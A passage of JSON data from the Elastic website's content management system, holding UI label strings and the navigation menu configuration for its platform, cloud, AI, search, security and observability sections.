5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-01-27T20:51:38.355Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt97cf5566d151b2d8","ACL":{},"created_at":"2023-01-26T21:09:02.936Z","created_by":"blt36e890d06c5ec32c","english_content":"More","tags":[],"title":"More","translate_content_l10n":"More","updated_at":"2023-01-26T21:09:02.936Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-01-27T20:51:44.435Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltda408b2b71cd18d9","ACL":{},"created_at":"2023-01-26T21:09:02.777Z","created_by":"blt36e890d06c5ec32c","english_content":"View more learning opportunities","tags":[],"title":"View more learning opportunities","translate_content_l10n":"View more learning opportunities","updated_at":"2023-01-26T21:09:02.777Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-01-27T20:51:48.807Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltc5c1c4900cfdb547","ACL":{},"created_at":"2023-01-26T21:09:02.430Z","created_by":"blt36e890d06c5ec32c","english_content":"Load more press releases","tags":[],"title":"Load more press releases","translate_content_l10n":"Load more press releases","updated_at":"2023-01-26T21:09:02.430Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-01-27T20:51:38.293Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blta759219421b27a99","ACL":{},"created_at":"2023-01-26T21:09:02.267Z","created_by":"blt36e890d06c5ec32c","english_content":"Load more news","tags":[],"title":"Load more news","translate_content_l10n":"Load more news","updated_at":"2023-01-26T21:09:02.267Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-03-14T16:29:48.588Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt04d58d965fb73d4b","ACL":{},"created_at":"2023-01-26T21:09:02.102Z","created_by":"blt36e890d06c5ec32c","english_content":"Read more","tags":[],"title":"Read more","translate_content_l10n":"Read more","updated_at":"2023-01-26T21:09:02.102Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-01-27T20:51:44.159Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltcecc4cb33d2f12d1","ACL":{},"created_at":"2023-01-26T21:09:01.933Z","created_by":"blt36e890d06c5ec32c","english_content":"What to explore next...","tags":[],"title":"What to explore next...","translate_content_l10n":"What to explore next...","updated_at":"2023-01-26T21:09:01.933Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-01-27T20:51:48.762Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt536f120184d5f82f","ACL":{},"created_at":"2023-01-26T21:09:01.766Z","created_by":"blt36e890d06c5ec32c","english_content":"More stories from Elastic Customers","tags":[],"title":"More stories from Elastic Customers","translate_content_l10n":"More stories from Elastic Customers","updated_at":"2023-01-26T21:09:01.766Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-01-27T20:51:44.267Z","user":"blt36e890d06c5ec32c"}},{"uid":"blt4b67bf09270df98e","_version":1,"locale":"en-us","ACL":{},"created_at":"2023-01-26T21:09:01.597Z","created_by":"blt36e890d06c5ec32c","english_content":"See All Posts","tags":[],"title":"See All Posts","translate_content_l10n":"See all posts","updated_at":"2023-01-26T21:09:01.597Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"time":"2024-09-27T18:34:33.604Z","user":"blt36e890d06c5ec32c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"_version":1,"locale":"en-us","uid":"blt76ad53f0811383e0","ACL":{},"created_at":"2023-01-26T21:09:01.432Z","created_by":"blt36e890d06c5ec32c","english_content":"Contact Info","tags":[],"title":"Contact Info","translate_content_l10n":"Contact information","updated_at":"2023-01-26T21:09:01.432Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-01-27T20:51:38.103Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltd24b268000310a17","ACL":{},"created_at":"2023-01-26T21:09:00.572Z","created_by":"blt36e890d06c5ec32c","english_content":"Register to Watch","tags":[],"title":"Register to Watch","translate_content_l10n":"Register to watch","updated_at":"2023-01-26T21:09:00.572Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-01-27T20:51:44.740Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltc387be0be6c7bba6","ACL":{},"created_at":"2023-01-26T21:09:00.393Z","created_by":"blt36e890d06c5ec32c","english_content":"Sign In to Attend","tags":[],"title":"Sign In to Attend","translate_content_l10n":"Sign in to attend","updated_at":"2023-01-26T21:09:00.393Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-01-27T20:51:44.633Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltd778a9bdcafbbc41","ACL":{},"created_at":"2023-01-26T21:09:00.219Z","created_by":"blt36e890d06c5ec32c","english_content":"Register to Attend","tags":[],"title":"Register to Attend","translate_content_l10n":"Register to attend","updated_at":"2023-01-26T21:09:00.219Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-01-27T20:51:44.790Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt5f3c4d1f3f7a64fe","ACL":{},"created_at":"2023-01-26T21:08:59.859Z","created_by":"blt36e890d06c5ec32c","english_content":"More posts","tags":[],"title":"More posts","translate_content_l10n":"More posts","updated_at":"2023-01-26T21:08:59.859Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-04-03T17:14:57.905Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt7e366458d1dd1e0c","ACL":{},"created_at":"2023-01-26T21:08:59.675Z","created_by":"blt36e890d06c5ec32c","english_content":"By","tags":[],"title":"By","translate_content_l10n":"By","updated_at":"2023-01-26T21:08:59.675Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-01-27T20:51:38.125Z","user":"blt36e890d06c5ec32c"}}]},"primeNav":[[{"_version":121,"locale":"en-us","uid":"blta694a81b23d8d1b6","ACL":{},"actions_nav_items":[{"link_type":"icon-link-with-dropdown","icon_name":"language-picker","title_l10n":"Language","_metadata":{"uid":"cs4d57cace9f8b81be"},"url":"","display_in_mobile_footer":true,"dropdown":[{"title_l10n":"Deutsch","_metadata":{"uid":"cs6b8052e8e3d6eeff"},"url":"/de/"},{"title_l10n":"English","_metadata":{"uid":"cs3e739da0e5dd755c"},"url":"/"},{"title_l10n":"Español","_metadata":{"uid":"cs6abb4025e07ad795"},"url":"/es/"},{"title_l10n":"Français","_metadata":{"uid":"csf1d3e66812e0bf02"},"url":"/fr/"},{"title_l10n":"日本語","_metadata":{"uid":"csc55ffdf988121f1a"},"url":"/jp/"},{"title_l10n":"한국어","_metadata":{"uid":"cs12fd960301a768cf"},"url":"/kr/"},{"title_l10n":"简体中文","_metadata":{"uid":"csa94cdb113d29264c"},"url":"/cn/"},{"title_l10n":"Português","_metadata":{"uid":"cs785765bc8a8317b4"},"url":"/pt/"}]},{"link_type":"search","icon_name":"search","title_l10n":"Search","_metadata":{"uid":"cs9e5210a44cd35e0e"},"url":"","display_in_mobile_footer":false,"dropdown":[]},{"link_type":"icon-link","icon_name":"login","title_l10n":"Login","_metadata":{"uid":"cs8256bccc1ea2456e"},"url":"https://cloud.elastic.co","display_in_mobile_footer":true,"dropdown":[]},{"link_type":"primary","icon_name":null,"title_l10n":"Start free trial","_metadata":{"uid":"cs27d6c530946181b6"},"url":"https://cloud.elastic.co/registration","display_in_mobile_footer":true,"dropdown":[]},{"link_type":"secondary","icon_name":null,"title_l10n":"Contact Sales","_metadata":{"uid":"cs6492748b6ed9ff24"},"url":"/contact","display_in_mobile_footer":true,"dropdown":[]}],"alert_bar":[],"created_at":"2023-04-20T14:14:37.626Z","created_by":"blt3e52848e0cb3c394","logo":{"elastic_logo":null,"url":"/"},"nav_items":[{"title_l10n":"Platform","_metadata":{"uid":"cs67c33f9bf7891f56"},"title_id":"nav-item-platform","url":"","sections":[{"title_l10n":"Elasticsearch Platform + ELK Stack","_metadata":{"uid":"cs28455439cc50fde8"},"background_style":"Gray","reference":[{"_content_type_uid":"site_navigation_reference","_version":33,"locale":"en-us","uid":"blte130d9e7e04c68ce","ACL":{},"below_column_modular_blocks":[{"cta_group":{"alignment":"left","width":"block","list":[{"type":"tertiary","title_l10n":"Partner overview","_metadata":{"uid":"cs287bd794fe8c916d"},"url":"/partners","icon_file":null,"icon_direction":null}],"_metadata":{"uid":"cs97e60956b4c77e82"},"footnote_l10n":""}}],"column_modular_blocks":[{"title":{"title_l10n":"The Search AI Company","_metadata":{"uid":"cs8a188450384d411d"},"url":"/platform"}},{"image":{"type":"thumbnail-fill container","file":{"uid":"bltb72b02d269f3201a","_version":1,"title":"nav-platform.png","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2024-05-14T15:34:13.950Z","updated_at":"2024-05-14T15:34:13.950Z","content_type":"image/png","file_size":"48119","filename":"nav-platform.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-05-15T12:50:43.247Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb72b02d269f3201a/6643847599f5a8667dc35ac7/nav-platform.png"},"_metadata":{"uid":"cs6d350f035dacb270"},"alt_text_l10n":"Search, Security, Observability"}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eBuild tailored experiences with Elastic.\u003c/p\u003e","_metadata":{"uid":"cscf9c3c37ecef1469"}}},{"cta_group":{"alignment":"left","width":"block","list":[{"type":"tertiary","title_l10n":"Elastic Search AI Platform overview","_metadata":{"uid":"cs65261558f229f943"},"url":"/platform","icon_file":null,"icon_direction":null}],"_metadata":{"uid":"csd2c7e2a0dcf7c4ee"},"footnote_l10n":""}},{"divider":{"color":"darkGray","height":"1px","_metadata":{"uid":"cse5d465d6bcfbf132"}}},{"paragraph":{"paragraph_l10n":"\u003cp\u003e\u003cstrong\u003eScale your business with Elastic Partners\u003c/strong\u003e\u003c/p\u003e","_metadata":{"uid":"cs361ee4966b199f0c"}}},{"sublinks":{"sublinks":[{"title_l10n":"Find a partner","_metadata":{"uid":"cs01f018b8e6c2aa61"},"url":"https://partners.elastic.co/findapartner/"},{"title_l10n":"Become a partner","_metadata":{"uid":"cs5f07508f60c9c0fe"},"url":"/partners/become-a-partner"}],"_metadata":{"uid":"cs6e2d31658c521070"}}}],"created_at":"2023-06-04T11:59:07.519Z","created_by":"blt3e52848e0cb3c394","style":{"type":"Ghost card"},"tags":[],"title":"Platform - Elasticsearch Platform","title_l10n":"","updated_at":"2024-05-15T18:25:30.252Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-05-15T18:25:42.923Z","user":"blt3044324473ef223b70bc674c"}},{"_content_type_uid":"site_navigation_reference","uid":"blt6fe143a8799b1d7b","_version":17,"locale":"en-us","ACL":{},"below_column_modular_blocks":[],"column_modular_blocks":[{"image":{"type":null,"file":{"_version":3,"is_dir":false,"uid":"blt0090c6239e64faf8","ACL":{},"content_type":"image/svg+xml","created_at":"2019-06-18T00:09:05.515Z","created_by":"blt3044324473ef223b70bc674c","description":"\"all\": \"Elastic Stack\"","file_size":"379","filename":"logo-stack-32-color.svg","parent_uid":"blt3dd6454f65ccc34c","tags":[],"title":"logo-stack-32-color.svg","updated_at":"2022-06-15T16:32:00.813Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-06-15T16:32:09.806Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0090c6239e64faf8/62aa0980c949fd5059e8aebc/logo-stack-32-color.svg","permanent_url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0090c6239e64faf8/logo-stack-32-color.svg"},"_metadata":{"uid":"cs56b531fd46473960"},"alt_text_l10n":""}},{"title":{"title_l10n":"ELK Stack","_metadata":{"uid":"csb2b0c9d496752b81"},"url":""}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eSearch and analytics, data ingestion, and visualization – all at your fingertips.\u003c/p\u003e","_metadata":{"uid":"cse32f929fa3057408"}}},{"sublinks":{"sublinks":[{"title_l10n":"Kibana","_metadata":{"uid":"csc13bf0787bfe64c3"},"url":"/kibana"},{"title_l10n":"Elasticsearch","_metadata":{"uid":"cs800aa8a08413ff75"},"url":"/elasticsearch"},{"title_l10n":"Integrations","_metadata":{"uid":"csac6f26e4d9dc92bf"},"url":"/integrations"}],"_metadata":{"uid":"csc0eb9aae95a2d760"}}},{"cta_group":{"alignment":"left","width":"block","list":[{"type":"tertiary","title_l10n":"ELK Stack overview","_metadata":{"uid":"cs8a81059a67502f8f"},"url":"/elastic-stack","icon_file":null,"icon_direction":null}],"_metadata":{"uid":"cs1d19ed20cdaf80ba"},"footnote_l10n":""}},{"divider":{"color":"darkGray","height":"1px","_metadata":{"uid":"cseed81fb40af11110"}}},{"paragraph":{"paragraph_l10n":"\u003cp\u003e\u003cstrong\u003eBy developers, for developers\u003c/strong\u003e\u003c/p\u003e","_metadata":{"uid":"csf65c9e004a53da0b"}}},{"sublinks":{"sublinks":[{"title_l10n":"Try the world's most used vector database","_metadata":{"uid":"csa74c6a42e5c25b13"},"url":"/elasticsearch/vector-database"},{"title_l10n":"Scale with the low-latency Search AI Lake","_metadata":{"uid":"cs79e8262c7a671730"},"url":"/blog/search-ai-lake-elastic-cloud-serverless"},{"title_l10n":"Join our community","_metadata":{"uid":"cs462063e2c301a820"},"url":"/community"}],"_metadata":{"uid":"cs4f61a5b050f66f94"}}}],"created_at":"2023-06-04T12:03:38.980Z","created_by":"blt3e52848e0cb3c394","sanity_migration_complete":false,"style":{"type":"Illustration Grid - two column"},"tags":[],"title":"Platform - ELK Stack","title_l10n":"","updated_at":"2024-12-04T20:16:54.644Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-12-04T20:16:59.029Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}]},{"title_l10n":"Elastic Cloud","_metadata":{"uid":"cs6c2a742c3201f02f"},"background_style":null,"reference":[{"_content_type_uid":"site_navigation_reference","uid":"blt2b4f1f6c89ecd6b2","_version":17,"locale":"en-us","ACL":{},"below_column_modular_blocks":[],"column_modular_blocks":[{"image":{"type":"icon-32","file":{"_version":2,"is_dir":false,"uid":"bltdb0f38c35ae455dc","ACL":{},"content_type":"image/svg+xml","created_at":"2019-06-17T19:56:54.761Z","created_by":"blt3044324473ef223b70bc674c","description":"\"all\": \"Elastic Cloud\"","file_size":"1716","filename":"logo-cloud-24-color.svg","tags":[],"title":"logo-cloud-24-color.svg","updated_at":"2021-12-17T19:41:38.654Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-12-17T19:46:22.193Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdb0f38c35ae455dc/5d07f086877575d0584760a3/logo-cloud-24-color.svg","permanent_url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdb0f38c35ae455dc/logo-cloud-24-color.svg"},"_metadata":{"uid":"cs03ac8608840d234a"},"alt_text_l10n":""}},{"title":{"title_l10n":"Elastic Cloud","_metadata":{"uid":"cse27182bd72de81f8"},"url":""}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eUnlock the power of real-time insights with Elastic on your preferred cloud provider.\u003c/p\u003e","_metadata":{"uid":"cs6cfc29a0530d445e"}}},{"cta_group":{"alignment":"left","width":"block","list":[{"type":"tertiary","title_l10n":"Elastic Cloud overview","_metadata":{"uid":"cs9e1ba22a61156b8e"},"url":"/cloud","icon_file":null,"icon_direction":null}],"_metadata":{"uid":"cs50a5b2b008340d9e"},"footnote_l10n":""}},{"divider":{"color":"darkGray","height":"1px","_metadata":{"uid":"csee961bd984575808"}}},{"sublinks":{"sublinks":[{"title_l10n":"Elastic Cloud Serverless","_metadata":{"uid":"cs974ba013957fd92b"},"url":"/cloud/serverless"},{"title_l10n":"Elastic Cloud Serverless pricing","_metadata":{"uid":"csa49e9903f1b062f6"},"url":"/pricing/serverless-search"},{"title_l10n":"Search AI Lake","_metadata":{"uid":"csd24af6c48b144268"},"url":"/cloud/serverless/search-ai-lake"}],"_metadata":{"uid":"csc5efe659a4339dfd"}}}],"created_at":"2023-06-04T12:03:32.338Z","created_by":"blt3e52848e0cb3c394","sanity_migration_complete":false,"style":{"type":"Illustration Grid - two column"},"tags":[],"title":"Platform - Elastic Cloud","title_l10n":"","updated_at":"2025-01-16T23:57:39.534Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2025-01-16T23:59:39.913Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}]}],"dropdown_footer":{"title_l10n":"","cards":[]}},{"title_l10n":"Solutions","_metadata":{"uid":"cs1538385775c98efd"},"title_id":"nav-item-solutions","url":"","sections":[{"title_l10n":"Generative AI","_metadata":{"uid":"cs8f79c87796141d46"},"background_style":"Gray","reference":[{"_content_type_uid":"site_navigation_reference","uid":"blt2b5b716b730e7095","_version":17,"locale":"en-us","ACL":{},"below_column_modular_blocks":[{"cta_group":{"alignment":"left","width":"block","list":[{"type":"tertiary","title_l10n":"Generative AI overview ","_metadata":{"uid":"cs43afe4a5eb95776a"},"url":"/generative-ai","icon_file":null,"icon_direction":null}],"_metadata":{"uid":"cs78bf3b3fd7424010"},"footnote_l10n":""}}],"column_modular_blocks":[{"title":{"title_l10n":"Generative AI","_metadata":{"uid":"cs18b2763e43ebbbea"},"url":"/generative-ai"}},{"paragraph":{"paragraph_l10n":"\u003cp\u003ePrototype and integrate with LLMs faster using search AI.\u003c/p\u003e","_metadata":{"uid":"csc2b19500d60f1812"}}},{"sublinks":{"sublinks":[{"title_l10n":"Search AI Lake","_metadata":{"uid":"cs35466fb715f2ee26"},"url":"/cloud/serverless/search-ai-lake"},{"title_l10n":"Elastic AI Assistant","_metadata":{"uid":"csa826ec74cb488fda"},"url":"/elasticsearch/ai-assistant"},{"title_l10n":"Retrieval Augmented Generation","_metadata":{"uid":"cscdbdc699afde4a02"},"url":"/enterprise-search/rag"}],"_metadata":{"uid":"csb397b8fbfeb59c8d"}}},{"divider":{"color":"darkGray","height":"1px","_metadata":{"uid":"csdfa77237ae8319e6"}}},{"sublinks":{"sublinks":[{"title_l10n":"Generative AI blogs","_metadata":{"uid":"csa1f8add36e960f17"},"url":"/blog/category/generative-ai"},{"title_l10n":"Search Labs tutorials","_metadata":{"uid":"cs6e6cd221ea191f9c"},"url":"https://www.elastic.co/search-labs/tutorials"},{"title_l10n":"Elastic Community","_metadata":{"uid":"cs9f83e06b285c3f47"},"url":"/community"}],"_metadata":{"uid":"cs67c6e2303b42bb57"}}}],"created_at":"2024-05-10T22:33:22.668Z","created_by":"blt3044324473ef223b70bc674c","sanity_migration_complete":false,"style":{"type":"Ghost card"},"tags":[],"title":"Solutions - Generative AI","title_l10n":"","updated_at":"2024-12-03T17:26:30.015Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-12-03T17:26:35.047Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}]},{"title_l10n":"Search, Security, Observability","_metadata":{"uid":"csdd81ddba0bf8cc4b"},"background_style":null,"reference":[{"_content_type_uid":"site_navigation_reference","_version":13,"locale":"en-us","uid":"bltc3a1cd40e0416b2c","ACL":{},"below_column_modular_blocks":[{"cta_group":{"alignment":"left","width":"block","list":[{"type":"tertiary","title_l10n":"Search overview","_metadata":{"uid":"csbd5496aa3d1b0190"},"url":"/enterprise-search","icon_file":null,"icon_direction":null}],"_metadata":{"uid":"cs44eaadf5237824b3"},"footnote_l10n":""}}],"column_modular_blocks":[{"image":{"type":"icon-32","file":{"uid":"blt549f7d977c2a88f4","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt36e890d06c5ec32c","created_at":"2019-06-18T00:15:48.602Z","updated_at":"2022-07-14T22:30:12.657Z","content_type":"image/svg+xml","file_size":"1812","filename":"logo-enterprise-search-32-color.svg","title":"logo-enterprise-search-32-color.svg","ACL":{},"_version":4,"is_dir":false,"tags":[],"description":"image_alternative_text: blt4c95fef51f752b47","parent_uid":"blt3dd6454f65ccc34c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-16T22:51:05.584Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt549f7d977c2a88f4/5d082d34616162aa5a85707d/logo-enterprise-search-32-color.svg","permanent_url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt549f7d977c2a88f4/logo-enterprise-search-32-color.svg"},"_metadata":{"uid":"cs170d33ec56ceac69"},"alt_text_l10n":""}},{"title":{"title_l10n":"Search","_metadata":{"uid":"cs775478cd77e6d292"},"url":""}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eDiscover a world of AI possibilities — built with the power of search.\u003c/p\u003e","_metadata":{"uid":"cs5a4b902119bba40f"}}},{"sublinks":{"sublinks":[{"title_l10n":"Vector database","_metadata":{"uid":"csed77c651fdd3174c"},"url":"/elasticsearch/vector-database"},{"title_l10n":"Relevance","_metadata":{"uid":"cs80141cb427dee0c1"},"url":"/enterprise-search/relevance"},{"title_l10n":"Search applications","_metadata":{"uid":"cs9d714be4e38ada8a"},"url":"/enterprise-search/search-applications"},{"title_l10n":"Ecommerce","_metadata":{"uid":"cs7963bae02344b71b"},"url":"/enterprise-search/ecommerce"},{"title_l10n":"Website search","_metadata":{"uid":"cs7836f56c55ba3cfe"},"url":"/enterprise-search/site-search"},{"title_l10n":"Workplace search","_metadata":{"uid":"csf4a77adc63248830"},"url":"/enterprise-search/workplace-search"},{"title_l10n":"Customer support","_metadata":{"uid":"cs445feacc70664066"},"url":"/enterprise-search/customer-support"}],"_metadata":{"uid":"csf4d2d6f3005e3796"}}},{"divider":{"color":"darkGray","height":"1px","_metadata":{"uid":"csbd1e64a45bcdc466"}}},{"sublinks":{"sublinks":[{"title_l10n":"Search Labs","_metadata":{"uid":"cs361d5d1595a1b47f"},"url":"https://www.elastic.co/search-labs"}],"_metadata":{"uid":"cs64700fb4732c0bd3"}}}],"created_at":"2023-06-04T12:03:13.040Z","created_by":"blt3e52848e0cb3c394","style":{"type":"Illustration Grid - two column"},"tags":[],"title":"Solutions - Search","title_l10n":"","updated_at":"2024-07-11T21:27:34.509Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-07-11T21:28:38.978Z","user":"blt3044324473ef223b70bc674c"}},{"_content_type_uid":"site_navigation_reference","uid":"blt63c42ebb62439573","_version":11,"locale":"en-us","ACL":{},"below_column_modular_blocks":[{"cta_group":{"alignment":"left","width":"block","list":[{"type":"tertiary","title_l10n":"Security overview","_metadata":{"uid":"cs607609172da7b010"},"url":"/security","icon_file":null,"icon_direction":null}],"_metadata":{"uid":"cs5975061ef819456a"},"footnote_l10n":""}}],"column_modular_blocks":[{"image":{"type":"icon-32","file":{"_version":2,"is_dir":false,"uid":"bltf58b7c8e04706979","ACL":{},"content_type":"image/svg+xml","created_at":"2020-01-16T23:28:40.015Z","created_by":"blt3044324473ef223b70bc674c","description":"\"all\": \"Elastic Security\"","file_size":"915","filename":"logo-security-32-color.svg","tags":[],"title":"logo-security-32-color.svg","updated_at":"2022-02-08T19:17:13.406Z","updated_by":"blt36e890d06c5ec32c","parent_uid":"blt3dd6454f65ccc34c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-03T20:41:01.783Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf58b7c8e04706979/5e20f1a8132ead1155e8d0a4/logo-security-32-color.svg","permanent_url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf58b7c8e04706979/logo-security-32-color.svg"},"_metadata":{"uid":"cs3fd34bcf6bd4aa1e"},"alt_text_l10n":""}},{"title":{"title_l10n":"Security","_metadata":{"uid":"cs6bfb6459afd01091"},"url":""}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eProtect, investigate, and respond to cyber threats with AI-driven security analytics.\u003c/p\u003e","_metadata":{"uid":"cs5cd48eb76a2507c5"}}},{"sublinks":{"sublinks":[{"title_l10n":"SIEM","_metadata":{"uid":"csca3f3d9c18e2a70b"},"url":"/security/siem"},{"title_l10n":"AI for the SOC","_metadata":{"uid":"cs423503ab8b0c29e9"},"url":"/security/ai"},{"title_l10n":"Threat Research","_metadata":{"uid":"csb0b9fd0791e6e0bb"},"url":"/security/cyber-threat-research"}],"_metadata":{"uid":"cs0f0079b9e8827b1a"}}},{"divider":{"color":"darkGray","height":"1px","_metadata":{"uid":"csf3e74156baa03a98"}}},{"sublinks":{"sublinks":[{"title_l10n":"Security Labs","_metadata":{"uid":"csd59f826a7734c6e5"},"url":"https://www.elastic.co/security-labs"}],"_metadata":{"uid":"csad4ae4404fd4fb84"}}}],"created_at":"2023-06-04T17:00:41.862Z","created_by":"blt3e52848e0cb3c394","style":{"type":"Illustration Grid - two column"},"tags":[],"title":"Solutions - Security","title_l10n":"","updated_at":"2024-07-26T21:43:38.678Z","updated_by":"blt27204bf9f7abb7fd","publish_details":{"time":"2024-07-29T14:22:51.164Z","user":"blt27204bf9f7abb7fd","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"_content_type_uid":"site_navigation_reference","uid":"bltb6f106dd636862a0","_version":20,"locale":"en-us","ACL":{},"below_column_modular_blocks":[{"cta_group":{"alignment":"left","width":"block","list":[{"type":"tertiary","title_l10n":"Observability overview","_metadata":{"uid":"cs1fd681e6a529b1d7"},"url":"/observability","icon_file":null,"icon_direction":null}],"_metadata":{"uid":"cs3d2c913e15258d90"},"footnote_l10n":""}}],"column_modular_blocks":[{"image":{"type":"icon-32","file":{"_version":3,"is_dir":false,"uid":"bltbf6ba0d0e0e1e5ab","ACL":{},"content_type":"image/svg+xml","created_at":"2020-01-16T23:28:26.433Z","created_by":"blt3044324473ef223b70bc674c","description":"image_alternative_text: blt6e3875f2cb65b010","file_size":"854","filename":"logo-observability-32-color.svg","parent_uid":"blt3dd6454f65ccc34c","tags":[],"title":"logo-observability-32-color.svg","updated_at":"2022-06-23T22:18:33.744Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-03T20:41:01.766Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltbf6ba0d0e0e1e5ab/5e20f19a2aa8e40a75136318/logo-observability-32-color.svg","permanent_url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltbf6ba0d0e0e1e5ab/logo-observability-32-color.svg"},"_metadata":{"uid":"cs6d88bb24abedd2e3"},"alt_text_l10n":""}},{"title":{"title_l10n":"Observability","_metadata":{"uid":"cs67387a91562b3205"},"url":"/observability"}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eUnify app and infrastructure visibility to proactively resolve issues.\u003c/p\u003e","_metadata":{"uid":"cs88a641ffc2911203"}}},{"sublinks":{"sublinks":[{"title_l10n":"Log monitoring and analytics","_metadata":{"uid":"cs1dd5fa6336795a30"},"url":"/observability/log-monitoring"},{"title_l10n":"OpenTelemetry","_metadata":{"uid":"cs519e0baebee3d9cb"},"url":"/observability/opentelemetry"},{"title_l10n":"Application performance monitoring","_metadata":{"uid":"cs94aa837d61a0762c"},"url":"/observability/application-performance-monitoring"},{"title_l10n":"Infrastructure monitoring","_metadata":{"uid":"cs4f06f89314df2822"},"url":"/observability/infrastructure-monitoring"},{"title_l10n":"Synthetic monitoring","_metadata":{"uid":"cs32572e3664317fa4"},"url":"/observability/synthetic-monitoring"},{"title_l10n":"Real user monitoring","_metadata":{"uid":"cs6c9d63696d568c3b"},"url":"/observability/real-user-monitoring"},{"title_l10n":"Universal Profiling","_metadata":{"uid":"csc17955dd2f2e9772"},"url":"/observability/universal-profiling"},{"title_l10n":"AIOps","_metadata":{"uid":"cs378204c3874ca8e0"},"url":"/observability/aiops"}],"_metadata":{"uid":"cs85b2751f40f3e527"}}},{"divider":{"color":"darkGray","height":"1px","_metadata":{"uid":"cs64367ecef14bcb75"}}},{"sublinks":{"sublinks":[{"title_l10n":"Observability 